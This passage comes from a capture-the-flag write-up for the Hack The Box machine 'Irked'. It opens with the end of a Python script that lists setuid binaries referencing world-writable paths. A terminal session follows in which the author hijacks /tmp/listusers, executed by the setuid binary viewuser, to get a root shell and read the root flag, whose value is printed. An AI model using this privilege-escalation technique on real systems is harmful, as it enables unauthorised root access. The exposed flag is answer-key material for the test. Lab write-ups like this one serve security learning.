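PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def find_setid_files(root: str) -> list[str]:
    """Regular files under root with the setuid or setgid bit. Directories are
    skipped: setgid on a directory only makes new files inherit its group."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def writable_path_refs(data: bytes) -> list[str]:
    """Printable strings in data that name a path under a world-writable directory."""
    refs = []
    for match in PRINTABLE_RUN.finditer(data):
        for token in match.group().decode("ascii").split():
            if token.startswith(WRITABLE_PREFIXES):
                refs.append(token)
    return refs


def triage(root: str) -> dict[str, list[str]]:
    """Map each setuid/setgid file under root to the writable paths embedded in it;
    files that embed none are left out so the odd one stands out."""
    flagged = {}
    for path in find_setid_files(root):
        try:
            data = Path(path).read_bytes()
        except OSError:
            continue  # e.g. -rwsr-xr-- binaries this user cannot read
        refs = writable_path_refs(data)
        if refs:
            flagged[path] = refs
    return flagged


if __name__ == "__main__":
    for path, refs in triage(sys.argv[1] if len(sys.argv) > 1 else "/usr").items():
        print(f"{path}: {', '.join(refs)}")
```

Run it with the directory to walk as the argument (python3 triage.py / takes a while; /usr covers the list above). A hit is only a lead: the next step is still to run the binary and watch what it tries to execute, as the viewuser session below does.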
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-05-25 10:21 (:0)
djmardov pts/0 2024-05-25 13:19 (10.10.14.50)
sh: 1: /tmp/listusers: not found
It said /tmp/listusers doesn't exist, so let's just create it.
djmardov@irked:~$ touch /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-05-25 10:21 (:0)
djmardov pts/0 2024-05-25 13:19 (10.10.14.50)
sh: 1: /tmp/listusers: Permission denied
It's presumably saying Permission denied because there's no execute permission. Adding execute permission made the error go away.
djmardov@irked:~$ chmod +x /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-05-25 10:21 (:0)
djmardov pts/0 2024-05-25 13:19 (10.10.14.50)
So if /tmp/listusers launches a shell, the shell runs as root. Got root.txt.
djmardov@irked:~$ echo "bash -i" > /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-05-25 10:21 (:0)
djmardov pts/0 2024-05-25 13:19 (10.10.14.50)
root@irked:~# pwd
/home/djmardov
root@irked:~# cd /root
root@irked:/root# cat root.txt
1eeb03bc31a3b7a53f2e391db6d86bf2
Solution summary
https://app.hackthebox.com/machines/Irked